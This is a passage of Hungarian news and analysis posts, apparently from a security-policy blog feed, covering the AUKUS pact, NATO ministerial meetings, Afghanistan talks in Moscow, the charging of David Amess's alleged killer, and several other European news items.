Áttérve a másik két szerződő országra, Nagy-Britannia nagykövetét Franciaország vissza sem hívta. Ennek oka lehet, hogy Franciaország nem tekinti Nagy-Britannia szerepét olyan jelentősnek, mint a másik két államét, elvégre a technológiát az USA adja, a vásárló pedig Ausztrália.  Másik oka lehet, hogy Franciaországnak szüksége van Nagy-Britanniára és különösen védelmi költségvetésére. Amióta Emmanuel Macron ’agyhalottnak’ nevezte a NATO-t, az egyik leghangosabb szószólója egy olyan európai haderőnek, amely független az USA-tól. Egy ilyen európai haderőhöz a Brexit és a brit-francia konfliktusok mellett is szükség van a brit hadiipari komplexumra. Ettől függetlenül azonban nem tett jót a franca-brit kapcsolatoknak a megállapodás. Le Diran, francia külügyminiszter szerint Angliától a „szokásos opportunizmus” látható. Milyen megfontolásból vesz hát részt Nagy-Britannia a megállapodásban? A miniszterelnök által a parlamentnek készített, 2021 márciusában kiadott „Global Britain in a competitive age” című dokumentumban bemutatja a kormány a 2030-ig szóló terveit. Ebben szerepel, hogy 2030-ra jelentősen növelje az Indiai-csendes-óceáni jelenlétét. Ebbe bele tartozik a gazdasági kapcsolatok erősítése és a kereskedelem növelése a térséggel. Ezzel összekapcsolva a stratégia része a terület biztonságának növelése, mivel a régióban geopolitikai verseny figyelhető meg. Továbbá a szöveg kiemeli, hogy támogatni kell a nemzetközi szabályokat és normákat. A térséggel kapcsolatos célkitűzés, hogy Európában Nagy-Britanniának legyen a legszélesebb és legintergáltabb jelenléte. Ebbe a stratégiába tökéletesen beleillik az AUKUS megállapodás. Ausztrália támogatásával megjelenik mint katonai szövetséges a térségben, a kínai hatalomgyakorlással szemben kiállhat a nemzetközi normák mellett és nem mellesleg gazdasági implikációi is lesznek az együttműködésnek. Emellett a PR szempont sem elhanyagolható. A Brexit után Nagy- Britanniának szüksége van az olyan megállapodásokra, amelyekkel demonstrálhatja a nemzetközi jelenlétét.

Az Egyesül Államok szempontjából a megállapodás tökéletesen beleillik Kína megfékezésére és elszigetelésére irányuló törekvésekbe. Bár az atomtechnológia az USA egyik legféltettebb titka, átadása valószínűleg meg fog térülni. Ebben az esetben az USA és Ausztrália érdekei összeérnek. A kínai tengeri erőkivetítéssel szemben a jelenleg szolgálatban álló 6 ausztrál tengeralattjáró és a flotta egésze nem rendelkezik elég elrettentő erővel. Az ausztrál flotta fejlesztése nem csak ausztrál szempont, hanem amerikai is. Tágabb értelemben az AUKUS-nak hasonló a célja, mint a 2017-es QUAD-nak, amelynek India, Japán, Ausztrália és az Egyesült Államok a tagjai. 2020-ban közös hadgyakorlatot tartottak és 2021. szeptember 24-én közös nyilatkozatot adtak ki, amelyben elkötelezték magukat egy „szabad és nyitott” Indiai-csendes-óceáni térség mellett. Rövid időn belül az AUKUS már a második ilyen szövetség. Látható, hogy az Egyesült Államok sorban gyűjti maga köré a Kínával szkeptikus vagy ellenséges államokat. Ebbe az ívbe illik a 2021-es brüsszeli NATO csúcs deklarációja is, amely szerint  „Kína ambíciói és tolakódó viselkedése szisztematikus kihívást jelent a szabály alapú nemzetközi rendszernek”. Ez az első NATO csúcs, amely megemlíti Kínát, eltekintve a 2019-es „lehetőség és kihívás” kategóriába soroló egyszeri említéstől. Az USA nagystratégiája mellett a PR szempontot itt is kell emelni. Az afganisztáni kivonulás után a Biden adminisztrációnak szüksége volt olyan külpolitikai eredményre, amely azt mutatja, hogy a kormány felkészült és kompetens döntéseket képes hozni külpolitika terén.

Konklúzióként levonható, hogy az AUKUS védelmi megállapodásához mindhárom felet gazdasági és geopolitikai érdekek vezérelték. Ausztráliának ki kellett lépnie egy költséges és elhúzódó szerződésből, miközben Kínával való kapcsolata folyamatosan romlott az elmúlt években. Nagy-Britannia részvétele magyarázható az ország Indiai-csendes-óceáni térség felé fordulásával – amelyet stratégiai szinten is rögzítettek – és a Brexit utáni útkereséssel. Az Egyesült Államok szemszögéből pedig a külpolitikai fókusz keletre tolódásának újabb állomása ez, egy újabb szövetség kötésével. A megállapodásnak azonban nem csak a három szerződő félre és Kínára lehet hatással, hanem Európára és a NATO-ra is. Bár Franciaország erősen felháborodott a bejelentésen, akár előnyt is tud az esetből kovácsolni. Macron az AUKUS megállapodás bejelentése után nem sokkal bejelentett egy együttműködést Görögországgal, mely keretein belül arról beszélt, hogy az USA az elmúlt tíz évben saját magával törődött és Kína és a Csendes-óceán felé fordult. Európának pedig le kell vonnia a következtetéseket és nem szabad naivnak lenni.  Bár Franciaországnak fájhat az az összeg, amelytől az AUKUS megállapodás miatt elesett, nem kellett sok idő, hogy Macron számára ez csak egy újabb érv legyen az európai haderő mellett. Így ez hosszú távon akár előnyös is lehet Franciaországnak. NATO szempontból pedig ez a Biden adminisztráció alatti második eset, amikor az európai szövetségesekkel való egyeztetés nélkül hozott az USA más szövetségeseket is érintő döntést (az első az afganisztáni kivonulás volt). Bár az nem valószínű, hogy az Egyesült Államok teljesen magára hagyná Európát, az ilyen lépések azt a benyomást kelthetik a kontinensen, hogy az USA figyelme elfordul Európáról. Ez pedig azt eredményezheti, hogy Európa újragondolja katonai függőségét az USA-tól.

Írta: Szalkai Patrik

Kiemelt kép: Ausztrália, Nagy-Britannia és az Egyesült Államok biztonsági partnersége
Washington, 2021. szeptember 16.
Joe Biden amerikai elnök (k), Scott Morrison ausztrál miniszterelnök (b) és brit hivatali partnere, Boris Johnson (j) videokonferencia keretében tart sajtótájékoztatót a washingtoni Fehér Házban 2021. szeptember 15-én. A sajtóértekezleten bejelentették, hogy háromoldalú védelmi és biztonsági partnerséget hoztak létre. A három ország angol nevének rövidítésbõl AUKUS-nak elnevezett kezdeményezés elsõdleges céljai közé tartozik az ausztrál haditengerészet felszerelése nukleáris meghajtású, de hagyományos fegyverzettel ellátott tengeralattjárókkal, az indiai- és a csendes-óceáni térség stabilitásának fenntartása érdekében.
Forrás: MTI/EPA/Sipa USA pool/Oliver Contreras

A Az AUKUS védelmi megállapodás geopolitikai és gazdasági háttere bejegyzés először Biztonságpolitika-én jelent meg.

A Nyugat-Balkán békéje és biztonsága úgy Magyarország, mint a NATO számára elsődleges fontosságú – jelentette ki a honvédelmi miniszter Brüsszelben pénteken, a NATO-tagállamok védelmi miniszteri tanácskozásának szünetében.

Benkő Tibor a közmédiának nyilatkozva hangsúlyozta: az Oroszország jelentette keleti, valamint az instabil államok okozta, a terrorizmus, az illegális migráció jelentette déli fenyegetés metszéspontja Közép-Európában, éppen Magyarországon van, ezért Budapest rendkívül fontosnak tartja, hogy “az egész régió biztonsága és stabilitása biztosítva legyen”.

Kiemelte: a NATO Magyarország jelentős hozzájárulásával akarja szavatolni a Nyugat-Balkán békéjét és biztonságát Koszovóban, ami azt jelenti, hogy október közepétől a legnagyobb NATO-művelet, a KFOR békefenntartó misszió élén magyar parancsnok áll.

“Az, hogy a Nyugat-Balkánon béke van, elsősorban a békefenntartó erőknek köszönhető, annak, hogy több ezer katona védi és biztosítja a mindennapi élet feltételeit” – fogalmazott.

A miniszter kijelentette: Magyarország a NATO biztonságot és védelmet fokozó célkitűzéseivel összhangban cselekszik. Azt teszi, amit a szövetség feladatként megfogalmaz a legfontosabb a nemzeti képességek kiépítésével, fejlesztésével és felajánlásával, valamint a védelmi költségvetés emelésével. Magyarország ütemterv szerint halad azzal a 2024-ig megvalósítani kívánt vállalásával is, hogy a hazai összterméke (GDP) legalább 2 százalékát védelmi kiadásokra fogja fordítani, valamint azon vállalás megvalósításával is, hogy ennek 20 százalékát fejlesztése fordítja. A NATO-célkitűzésekhez járul hozzá továbbá a magyar vezetésű, többnemzetiségű hadosztály-parancsnokság, ahogy a regionális különleges műveleti komponensparancsnokság létrehozása is – mondta.

A NATO afganisztáni szerepvállalásával kapcsolatban Benkő azt mondta: a misszió lezárása kivonulás helyett inkább kimenekítésnek nevezhető, ugyanis – mint fogalmazott -, “egyértelmű, hogy egy műveleti területet így nem lehet otthagyni, egy katonai műveletet nem lehet így befejezni”. “Nem az a fontos kérdés, hogy hány embert menekítettük ki, hanem az, hányan maradtak ott a segítségre szorulók közül” – fogalmazott.

Noha a szerepvállalás kezdetben a terrorizmus elleni küzdelemről, melegágyának felszámolásáról szólt, a húszéves jelenlét tapasztalatait, sikereit és kudarcait összegző konszenzusos állásfoglalás megfogalmazásához hosszú időre lesz szükség – mondta. A misszió befejezése intő példa mindenki számára arra vonatkozóan, hogy a katonai műveleteket a katonákra kell bízni – tette hozzá a honvédelmi miniszter.

The post Benkő: a Nyugat-Balkán békéje és biztonsága elsődleges fontosságú Magyarország számára appeared first on .

Oroszország felhívja a tálibokat, hogy ne változtassák a terroristák kiinduló bázisává Afganisztánt – jelentette ki Szergej Lavrov orosz külügyminiszter a “moszkvai formátumú” Afganisztán-konzultációk újabb, harmadik fordulóján szerdán az orosz fővárosban.

Lavrov méltatta az új afganisztáni vezetés erőfeszítéseit az ország katonai és politikai helyzete stabilizálásának érdekében. Egyúttal sajnálkozását fejezte ki amiatt, hogy az Egyesült Államok nem vesz részt a tanácskozáson. Megjegyezte, hogy az amerikai fél immár második alkalommal hárította el a részvételt a “kibővített trojka” – Oroszország, az Egyesült Államok és Kína – Afganisztánról szóló tanácskozásán, és kifejezte reményét, hogy ezt nem elvi kifogások alapján tette.

Hangot adott feltételezésének, hogy a távollét oka az Egyesült Államok afganisztáni különmegbízott posztján minap történt személycsere. A tisztséget eddig betöltő Zalmay Khalilzadot ugyanis Thomas West váltotta.

Moszkvában szerdán tizenegy ország képviselői, köztük a Kabulban hatalomra került tálibok ültek kerekasztalhoz, hogy Afganisztán katonai és politikai jövőjéről, az inkluzív – minden jelentős társadalmi csoportnak és a nőknek is képviseletet biztosító – afgán kormány megalakításáról és az ország humanitárius segélyezéséről tanácskozzanak. Az orosz külügyminisztérium az eseményt “zárt ajtók mögött tartott őszinte párbeszédként” jellemezte.

Ilyen méretű nemzetközi konzultációt először rendeznek a tálibok afganisztáni hatalomátvétele óta. Legutóbbi 2017 áprilisában, valamint 2018 novemberében tartottak találkozót a “moszkvai formátum” jegyében.

A formátum 2017-ben jött létre a különmegbízotti szintű hatoldalú – orosz-afgán-kínai-pakisztáni-iráni-indiai – konzultációs mechanizmus alapján. A mostani fordulón Oroszország, Afganisztán, India, Irán, Kazahsztán, Kirgizisztán, Kína, Pakisztán, Tádzsikisztán, Türkmenisztán és Üzbegisztán képviselteti magát.

A tanácskozást megelőzően szerdán Lavrov külön is fogadta az Abdal Szalam Hanafi, az ideiglenes kormány miniszterelnök-helyettese vezette tálib küldöttséget, amelynek több tárcavezető is tagja. A TASZSZ orosz hírügynökség úgy értesült, hogy a moszkvai konzultációra eljött Hamid Karzai volt afgán elnök és Abdulla Abdulla, a legfelsőbb nemzeti megbékélési tanács korábbi elnöke is.

Az orosz külügyminisztérium szerint, amely az újabb fordulótól nem vár áttörést, a tanácskozáson közös nyilatkozatot fogadhatnak el.

The post Lavrov azt szeretné, hogy a tálibok jók legyenek… appeared first on .

Márciusban kezdődik annak a 25 éves brit férfinek a pere, akit Sir David Amess parlamenti képviselő meggyilkolásával vádolnak.

A 69 esztendős, nős, ötgyermekes Amess, aki csaknem négy évtizedig volt a brit Konzervatív Párt alsóházi frakciójának tagja, múlt pénteken képviselői fogadóórát tartott délkelet-angliai választókörzetében, az Essex megyei Leigh-on-Sea kisvárosban, amikor a fiatal férfi egy késsel többször megszúrta.

Sir David a gyors orvosi beavatkozás ellenére a helyszínen meghalt. A gyilkosság elkövetésével gyanúsított, londoni illetőségű Ali Harbi Alit ugyancsak a helyszínen elfogták.

A Scotland Yard bejelentette, hogy Ali ellen gyilkosság és terrorcselekmények előkészítése címén hivatalosan vádat emeltek, miután a vádemelést az angol-walesi főügyészség (Crown Prosecution Service, CPS) kiemelt bűncselekményekkel és terrorelhárítással foglalkozó ügyosztálya engedélyezte.

Alival, akit a szigoráról hírhedt londoni Belmarsh börtönben tartanak fogva, péntek este, videókapcsolaton tartott rövid előzetes meghallgatáson közölte a londoni központi büntetőbíróság, hogy pere 2022. március 7-én kezdődik. Harbi Ali a dél-londoni Croydon kerületben született 1996-ban, egy szomáliai család gyermekeként. A BBC közszolgálati médiatársaság úgy értesült, hogy Ali édesapja korábban Szomáliában miniszterelnöki tanácsadóként tevékenykedett.

A Scotland Yard Alin kívül mást nem vett őrizetbe, és a nyomozók mást nem is keresnek a képviselő meggyilkolásának ügyében.

Nick Price, az angol-walesi főügyészség kiemelt bűncselekményekkel és terrorelhárítással foglalkozó ügyosztályának vezetője a vádemelés csütörtöki bejelentéséhez fűzött nyilatkozatában közölte: a vádhatóság azt a megállapítást terjeszti majd a bíróság elé, hogy Sir David Amess meggyilkolása terrorizmushoz kötődő bűncselekmény, amelynek vallási és ideológiai indítékai voltak.

A Scotland Yard terrorellenes parancsnoksága – amely a képviselő meggyilkolása után szinte azonnal átvette a vizsgálat irányítását – már múlt szombaton bejelentette, hogy az addigi nyomozati adatok alapján terrorcselekménynek tekinti a gyilkosságot.

Priti Patel brit belügyminiszter kérésére a hírszerzési és elhárítási szolgálatok, valamint a Scotland Yard terrorellenes ügyosztályának vezetői alkotta Egyesített Terrorizmuselemző Központ (Joint Terrorism Analysis Centre, JTAC) az egy héttel ezelőtti gyilkosság után felmérte és jelentősnek minősítette az alsóházi képviselőket fenyegető terrorkockázatokat. A testület hangsúlyozta ugyanakkor, hogy nem tárt fel olyan információt, amely bármilyen hiteles, konkrét vagy azonnali fenyegetésre utalna.

The post Márciusban kezdik a brit parlamenti képviselő meggyilkolásával vádolt férfi perét appeared first on .

A NATO célja egy nukleáris fegyverek nélküli világ megteremtése, ugyanakkor nem hisz az egyoldalú leszerelésben, ha ugyanis csak olyan országok, mint Kína, Oroszország és Észak-Korea rendelkeznének ilyen fegyverekkel, a világ nem lesz biztonságos – jelentette ki a NATO főtitkára.

Jens Stoltenberg a NATO-tagországok védelmi minisztereinek csütörtökön kezdődő kétnapos tanácskozása előtt arról beszélt, hogy a biztonság szavatolása érdekében a szövetségnek következetesnek kell maradnia, ami azt jelenti, hogy fenntartja a védelemre, elrettentésre és a párbeszéd fenntartására támaszkodó politikáját.

Elmondta, a tagállamok védelmi miniszterei a kétnapos ülés során a kollektív védelem fokozását szolgáló képességek új céljait határozzák meg annak biztosítására, hogy az euroatlanti térségben a szükséges erők a megfelelő időben a megfelelő helyen legyenek. Megállapodást írnak alá a tagállamokban esetlegesen eltérő technológiai eszközök különbségeinek csökkentésére, valamint egy innovációs alapot hoznak létre egymilliárd euró értékben a közös biztonság szavatolására. Emellett megállapodnak a mesterséges intelligenciára vonatkozó első NATO-stratégiáról is – tájékoztatott.

Afganisztánnal kapcsolatban a főtitkár azt mondta, a miniszterek értékelést végeznek a misszió működésének eredményeiről, valamint a kivonulás tanulságairól. Számba veszik majd, mely intézkedések hoztak eredményeket, melyek fulladtak kudarcba. Noha a tálibok ismét hatalomra kerültek, és szenvedést okoznak az ország lakosainak többsége számára, a szövetséges erők missziója nem volt hiábavaló – jelentette ki. Szavai szerint az egyik ilyen eredmény, hogy a szövetséges erők éveken át biztosították, hogy az ország ne szolgáljon a terroristák biztos menedékéül. Most a feladat az elért eredmények megtartása, illetve az, hogy a tálib kormány betartsa a terrorizmus elleni küzdelemre, az emberi jogok biztosítására és az országot elhagyni akaró afgánok szabad távozásának szavatolására tett vállalásait – emelte ki.

Azzal az orosz bejelentéssel összefüggésben, hogy Moszkva felfüggeszti az észak-atlanti szövetségnél működő képviseletének tevékenységét – arra válaszul, hogy a NATO október 6-án kiutasította az orosz képviselet nyolc munkatársát -, Stoltenberg azt mondta: szükség van a párbeszéd folytatására Oroszoroszággal. Különösen, amikor a NATO és Oroszország közötti kapcsolatok a hidegháború vége óta nem tapasztalt alacsony szintre süllyedtek – tette hozzá a NATO főtitkára.

The post Stoltenberg: a NATO célja egy nukleáris fegyverek nélküli világ megteremtése appeared first on .

Törökországban előzetes letartóztatásba helyezték az izraeli Moszad hírszerző szervezet 15 állítólagos ügynökét – jelentette az NTV török hírtelevízió.

Az állítólagos kémeket, akik között arab származásúak is vannak, a török hírszerzés (MIT) még október 7-én fogta el az ország négy különböző tartományában. A műveletet egy év munka előzte meg, amelyben 200 ember vett részt. Az NTV információi szerint a 15 gyanúsított háromtagú sejtekbe szerveződött.

Elsősorban török állampolgárokról, valamint olyan, Törökországban élő külföldi egyetemi hallgatókról gyűjtöttek adatokat, akik később a védelmi ipar területén készültek elhelyezkedni. Továbbá arról igyekeztek információkat szerezni, hogy Törökország milyen könnyebbségeket biztosít a területén élő palesztinoknak. Mindezen felül egyesületek és más társadalmi szervezetek után is kutakodtak.

A Sabah török kormánypárti napilap arról is beszámolt, hogy az ügynökök a feltűnés elkerülése végett külföldön, európai és afrikai városokban találkoztak feletteseikkel, például Zágrábban, Bukarestben, Zürichben és Nairobiban.

A sajtóértesülés szerint az érintettek ellen várhatóan vádat emelnek. A török hatóságok egyelőre nem szólaltak meg az ügyben.

The post Törökországban letartóztattak 15 állítólagos Moszad-ügynököt appeared first on .

Az illegális migráció miatt megerősítik a német-lengyel határ ellenőrzését, a német-osztrák határon pedig ismét meghosszabbítják az átkelők ideiglenesen visszaállított állandó ellenőrzését – mondta a német belügyminiszter.

Horst Seehofer a Bild am Sonntag című lapban közölt interjúban elmondta, hogy a határőrizetért felelős szövetségi rendőrség nyolc századát vezényelték a Lengyelországgal közös határszakaszra a helyi egységek munkájának támogatására, és szükség esetén további erősítést is küldenek. “Szigorúan ellenőrizni fogjuk a határvidéket és a Lengyelországgal közös zöldhatárt” – húzta alá a miniszter.

Azzal kapcsolatban, hogy a német-lengyel és a német-osztrák határszakasz is úgynevezett schengeni belső határ, amelyen alapesetben nincs folyamatos ellenőrzés, kiemelte, hogy meg kell őrizni a belső határok szabad átjárhatóságát, de ez csak akkor lehetséges, ha működik a külső határ védelme.

Ez a feltétel egyelőre nem teljesül kellőképpen. A kormány ezért értesítette az Európai Bizottságot, hogy további hat hónappal meghosszabbítják a 2015-ben visszaállított állandó ellenőrzést Bajorország tartomány és Ausztria határán, ahol eléri Németországot a balkáni migrációs útvonalon és az Olaszország felől érkező menedékkérők többsége.

Ha a német-lengyel határon nem javul a helyzet, akkor azt is meg kell fontolni, hogy Lengyelországgal és a határvidéken fekvő Brandenburg tartománnyal egyeztetve ezen a határszakaszon is visszaállítsák-e az állandó ellenőrzést. Azonban ezt a kérdést már a következő kormánynak kell eldöntenie – fejtette ki Seehofer.

Ismertette, hogy a fehérorosznak és keletinek is nevezett migrációs útvonalon – Fehéroroszországon és Lengyelországon keresztül – az év eleje óta 6162 ember lépett be engedély nélkül Németországba.

Továbbra is érkeznek menedékkérők a balkáni útvonalon és Olaszország felől is. Ráadásul a tálib hatalomátvétel után Afganisztánból az európai uniós társországokba menekített afgánok közül egyre többen vándorolnak át Németországba. Mindez azt jelenti, hogy “nem lehet nem észrevenni a Németországba irányuló migrációt” – mondta a miniszter.

A lengyel-fehérorosz határon kiépíteni tervezett védelmi rendszerről azt mondta, hogy a varsói vezetés törekvése az uniós külső határ ellenőrzésére “legitim”. Kiemelte: “az európai eszme alapján meggyőződésem, hogy tudnunk kell, ki jön hozzánk”, ezért “jogszerű, hogy a külső határt úgy védjük, hogy a zöldhatáron megakadályozzuk a felderítetlen belépéseket”.

A Németországba Fehéroroszországon és Lengyelországon keresztül érkező menedékkérők száma az Aljakszandr Lukasenka elnök vezette minszki rezsim tevékenységével összefüggésben ugrott meg. Az Európai Bizottság ezt a tevékenységet államilag finanszírozott és fehérorosz állami idegenforgalmi vállalatok által szervezett embercsempészetként jellemezte egy októberi jelentésében.

Németországba a legutóbbi nagy migrációs hullám idején, 2015-ben mintegy 890 ezer menedékkérő érkezett. Számuk 2016-ban 280 ezerre süllyedt, és azóta is folyamatosan csökken, de a százezret így is minden évben meghaladta.

The post Megerősítik a német-lengyel határ ellenőrzését appeared first on .

A november elején kezdődő év végi kötelező gépjármű-felelősségbiztosítási (kgfb) kampány még idén is csaknem egymillió gépjárművet, köztük mintegy 550 ezer személygépkocsit érint majd, az év végi váltási időszakban százezer szerződésváltásra számítanak a szakértők – közölte a Független Biztosítási Alkuszok Magyarországi Szövetsége (FBAMSZ).

A tájékoztatás szerint Papp Lajos, a szövetség gépjárműszekciójának elnöke jelezte, hogy a kgfb-kampány továbbra is a teljes hazai gépjárműállomány csaknem egyötödét érinti, az előző évek tapasztalatai alapján az érintettek körülbelül 10 százaléka él a biztosításváltás lehetőségével.

Az érintett 13 biztosító idén is legkésőbb november 2-ig hirdetheti ki az év végi tarifákat. Az érintett ügyfelek ezt követően tudják majd összehasonlítani a piacon elérhető lehetőségeket a meglévő biztosítójuk által megajánlott díjjal, amelyet november 11-ig kell megkapniuk postai úton, vagy e-kommunikációs szerződés esetén e-mailben.

A meglévő szerződés felmondására legkésőbb december elseje éjfélig van lehetőség. Az új biztosítás kiválasztásának határideje december 31-e, a szakértő ugyanakkor azt javasolja, hogy az ügyfelek az új szerződés megkötését ne hagyják az ünnepi időszakra.

Sebestyén László, a Netrisk.hu ügyvezető igazgatója szerint a gépjárművek üzembentartóinak a tavalyihoz képest átlagosan öt-tíz százalékos díjemelkedésre kell felkészülniük. Ez azt jelenti, hogy az újonnan megkötött szerződések éves átlagos díja személygépkocsik esetében 28-29 ezer forint körül alakul majd.

Ez az összeg jelentősen alacsonyabb az évközi váltók éves átlagdíjánál, ami szeptemberben a Netrisk.hu adatai szerint 46 500 forint volt. Az online biztosításközvetítő portál tájékoztatása szerint a különbséget az érintett autók speciális összetétele magyarázza. Január elsejével ugyanis jellemzően a 2010 előtt vásárolt gépjárművek üzembentartói válthatnak szerződést, ezeknek pedig háromnegyede a legkedvezőbb, B10 bónuszfokozattal rendelkezik, az üzemeltetőik átlagéletkora is magasabb, amelyhez szintén alacsonyabb szorzók kapcsolódnak.

Az autósok 2010. január 1-je előtt egységesen január elsejei évfordulóval köthettek kötelező biztosítást. Az azóta megvásárolt gépjárművek szerződéseinél azonban már nem a naptári kezdőnap, hanem a megvásárlás napja számít évfordulónak, amikor lehetőség van a biztosítót váltani, 2010 óta tehát évről évre csökken az év végén forduló kgfb-szerződések aránya.

The post Mintegy százezer kötelező biztosítást cserélnek le az év végi kampányban szakértők szerint appeared first on .

A globális biztonság folyamatosan romlik, a NATO célja azonban továbbra is a béke megőrzése és az agresszió megakadályozása – jelentette a NATO főtitkára a tagországok védelmi minisztereinek kétnapos tanácskozását követően.

Jens Stoltenberg hangsúlyozta, a szakminiszterek fontos tanácskozást folytattak a Nukleáris Tervezési Csoport keretében, és elkötelezték magukat a szövetség megerősítése mellett a közös biztonság megőrzése érdekében. A csoport konzultációi elengedhetetlenek ahhoz, hogy a NATO hiteles nukleáris szövetség maradjon mindaddig, amíg az atomfegyverek léteznek – jelentette ki.

Elmondta, a tagországok fontos lépéseket tettek a NATO védelmi kapacitásának javítása érdekében egy új innovációs alap pénteken elfogadott létrehozásával. Az alap támogatni fogja az egyre nagyobb számban jelentkező, a szövetség biztonságát megzavaró technológiákkal szembeni fellépés kidolgozását, és egymilliárd euró értékben járul hozzá a közös biztonság szavatolásához a katonai szövetség új innovációs rendszerének kiépítésével. A rendszer azt kívánja elérni, hogy a civil szférában született kutatási eredményeket becsatornázza a hadiipar területére. Ez biztosítja, hogy a szövetségesek ne maradjanak le a biztonság szempontjából kulcsfontosságú, legújabb technológiáról és képességekről – mondta.

Tájékoztatása szerint a miniszterek megállapodtak a szövetség mesterséges intelligenciára vonatkozó első stratégiájában is. A stratégia a nemzetközi joggal összhangban szabványokat határoz meg a mesterséges intelligencia felelős használatára vonatkozóan. A főtitkár reményét fejezte ki, hogy a szövetségeseknek sikerül megerősíteniük együttműködésüket a katonai mobilitás, az ellenállóképesség fokozása, valamint az éghajlatváltozás biztonsági hatásainak területén is.

Joe Biden kijelentésével kapcsolatban, amely szerint az Egyesült Államok megvédené Tajvant egy esetleges kínai támadással szemben, Stoltenberg kérdésre válaszolva azt monda: fontos a feszültség csökkentése a térségben, a vitákat azonban politikai és diplomáciai eszközökkel kell megoldani.

Lloyd Austin amerikai védelmi miniszter a sajtótájékoztatóján azt hangoztatta: az Egyesült Államok kiszámíthatóságot és stabilitást akar az Oroszországgal fennálló kapcsolatokban, elkötelezett a NATO mellett, valamint széles körű támogatást biztosít Tajvannak és az Európai Uniónak egyaránt. Kijelentette: az Egyesült Államok támogatja, hogy az európai védelem hatékonyabbá váljon. Továbbra is együtt kíván dolgozni a béke megerősítésén. A NATO ereje nem csak katonai teljesítményéből, hanem egységéből és a közös célok meghatározásából és megvalósításából fakad – tette hozzá.

Az afganisztáni szerepvállalással összefüggésben azt mondta, az Egyesült Államok a NATO-szövetségesekkel együtt ment Afganisztánba, majd húsz évvel később közösen hagyták el az országot. “Az afgán háború veteránjaként különösen hálás vagyok NATO-szövetségeseink közreműködéséért és áldozataiért” – fogalmazott. A NATO-t alapító egyezmény központi elemének számító, a kollektív védelem elvét rögzítő 5. cikket az Egyesült Államok továbbra is “szent kötelezettségnek” tekinti – tette hozzá Austin.

The post Stoltenberg: a NATO célja a béke megőrzése és az agresszió megakadályozása appeared first on .

Lefejezve találtak rá egy idős férfira a dél-franciaországi Bollene településen, az unokája otthonában. Ez utóbbit gyanúsítja a rendőrség a bűncselekmény elkövetésével. A férfit mintegy száz rendőr kereste egy napon át, A feltételezett tettest, az áldozat unokáját előállították – közölték nyomozati források.

Pierre Gagnoud, Carpentras városa illetékes ügyészének tájékoztatása szerint a bűncselekmény “példátlan erőszakról” tanúskodik, az áldozat fejét levágták, majd a holttestet kibelezték. Az ügyészség kizárta, hogy terrorcselekmény történt, ugyanakkor egyes lapok úgy fogalmaztak: a nyomozás jelenlegi szakaszában terrorcselekmény feltételezése “nem élvez abszolút elsőbbséget”.

A nyomozók feltételezése szerint családon belüli erőszak állhat a háttérben, a feltételezett elkövető pszichiátriai problémákkal küzd. A 37 éves férfit éjszaka állították elő a tetthely közelében. Az ügyben szándékos emberölés gyanújával indult eljárás.

A bűncselekmény a 13 ezer lakosú Bollene településen történt, amely a dél-franciaországi Vaucluse megyében, Montélimar és Orange városka között fekszik. A gyanúsítottat szerda este mintegy száz csendőr kereste, a fotóját a rendőrség a közösségi oldalakon is közzétette, jelezve, hogy veszélyes és fegyveres embert keresnek.

Egy héttel ezelőtt egy 77 éves nyugdíjas tanítónőt fejeztek le a dél-franciaországi Agde településen található otthonában. Az elkövetőt akkor is másnapra már előállították, emberölés miatt emelnek vádat ellene. Az 51 éves gyanúsított a nő bejárónőjének volt férje, aki időnként kisebb munkákat végzett az áldozata házában. Az elkövető a rendőrségi jelentés szerint neurológiai problémákkal küszködött.

The post Horror: már megint lefejeztek valakit Franciaországban appeared first on .

Vádat emeltek egy 25 éves brit férfi ellen, akit Sir David Amess parlamenti képviselő meggyilkolásának gyanújával vettek őrizetbe a múlt héten.

A 69 esztendős, nős, ötgyermekes Amess, aki csaknem négy évtizedig volt a brit Konzervatív Párt alsóházi frakciójának tagja, múlt pénteken képviselői fogadóórát tartott délkelet-angliai választókörzetében, az Essex megyei Leigh-on-Sea kisvárosban, amikor a fiatal férfi egy késsel többször megszúrta.

Sir David a gyors orvosi beavatkozás ellenére a helyszínen meghalt. A gyilkosság elkövetésével gyanúsított, londoni illetőségű Ali Harbi Alit ugyancsak a helyszínen elfogták.

A Scotland Yard bejelentette, hogy Ali ellen gyilkosság és terrorcselekmények előkészítése címén hivatalosan vádat emeltek, miután a vádemelést az angol-walesi főügyészség (Crown Prosecution Service, CPS) kiemelt bűncselekményekkel és terrorelhárítással foglalkozó ügyosztálya engedélyezte.

A rendőrség most első ízben nevezte meg a vádlottat, jóllehet a felételezett elkövető neve a brit sajtóban már röviddel a gyilkosság után megjelent. Egybehangzó brit médiaértesülések szerint Ali Harbi Ali Londonban született egy szomáliai család gyermekeként. A BBC közszolgálati médiatársaság úgy értesült, hogy Ali édesapja korábban Szomáliában miniszterelnöki tanácsadóként tevékenykedett.

Matt Jukes, a Scotland Yard különleges műveleti osztályának parancsnok-helyettese azonban a vádemeléskor azt kérte, hogy az érthető módon hatalmas közérdeklődés ellenére mindenki tanúsítson önmérsékletet a vádlott hátteréről, előtörténetéről, indítékairól szóló találgatásokkal, annak érdekében, hogy a majdani bírósági eljárás méltányosságát semmi ne veszélyeztesse. Jukes elmondta, hogy a rendőrség Alin kívül mást nem vett őrizetbe, és a nyomozók mást nem is keresnek a képviselő meggyilkolásának ügyében.

Nick Price, az angol-walesi főügyészség kiemelt bűncselekményekkel és terrorelhárítással foglalkozó ügyosztályának vezetője a vádemelés csütörtöki bejelentéséhez fűzött nyilatkozatában közölte: a vádhatóság azt a megállapítást terjeszti majd a bíróság elé, hogy Sir David Amess meggyilkolása terrorizmushoz kötődő bűncselekmény, amelynek vallási és ideológiai indítékai voltak.

A Scotland Yard terrorellenes parancsnoksága – amely a képviselő meggyilkolása után szinte azonnal átvette a vizsgálat irányítását – már szombaton bejelentette, hogy az addigi nyomozati adatok alapján terrorcselekménynek tekinti a gyilkosságot.

Ennek megfelelően Ali Harbi Alit – akit eredetileg gyilkosság gyanújával vettek őrizetbe – immár a 2000-ben kelt terrorellenes törvény alapján tartják rendőrségi őrizetben.

Priti Patel brit belügyminiszter szerda este a londoni alsóházban elmondta: a hírszerzési és elhárítási szolgálatok, valamint a Scotland Yard terrorellenes ügyosztályának vezetői alkotta Egyesített Terrorizmuselemző Központ (Joint Terrorism Analysis Centre, JTAC) a múlt heti gyilkosság után felmérte és jelentősnek minősítette az alsóházi képviselőket fenyegető terrorkockázatokat, azzal együtt is, hogy nincs olyan információ vagy hírszerzési adat, amely bármilyen hiteles, konkrét vagy azonnali fenyegetésre utalna.

Öt éven belül másodszor történt olyan halálos végű támadás Nagy-Britanniában, amelyet parlamenti képviselő ellen követtek el.

